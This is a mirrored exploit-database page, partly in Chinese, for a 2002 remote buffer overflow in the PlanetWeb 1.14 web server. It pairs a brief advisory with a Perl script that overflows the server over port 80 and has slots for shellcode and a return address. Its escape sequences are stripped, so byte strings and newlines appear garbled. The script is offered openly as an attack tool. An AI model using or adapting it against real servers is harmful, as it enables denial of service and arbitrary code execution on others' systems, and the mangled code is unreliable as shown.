PlanetDNS PlanetWeb 1.14 – Remote Buffer Overflow

PlanetDNS PlanetWeb 1.14 – Remote Buffer Overflow

漏洞ID 1053631 漏洞类型
发布时间 2002-10-17 更新时间 2002-10-17
图片[1]-PlanetDNS PlanetWeb 1.14 – Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-PlanetDNS PlanetWeb 1.14 – Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21945
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5988/info

PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems.

PlanetWeb does not properly handle long requests. Due to insufficient bounds checking, a long request sent to PlanetWeb may result in a buffer overflow. This could result in a denial of service, and has been reported as being exploitable to execute arbitrary code. 

#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet christal...plus tu p�dales moins fort, moins tu #avances plus vite..)
#

use IO::Socket;
if ($#ARGV<0)
{
 print "n write the target IP!! nn";
 exit;
}

$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#add your favorit shellcode
$buffer = "A"x6444;
$ebx = "x90xEBx08x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
$ret = "x43x43x43x43";# insert your ret address with (jmp ebx or call ebx)
$minibuf ="x90x90x90x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "nsending exploit......nn";

相关推荐: Solaris Transarc DCE Distributed File System (DFS)权限许可和访问控制漏洞

Solaris Transarc DCE Distributed File System (DFS)权限许可和访问控制漏洞 漏洞ID 1207637 漏洞类型 未知 发布时间 1996-09-17 更新时间 1996-09-17 CVE编号 CVE-1999-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享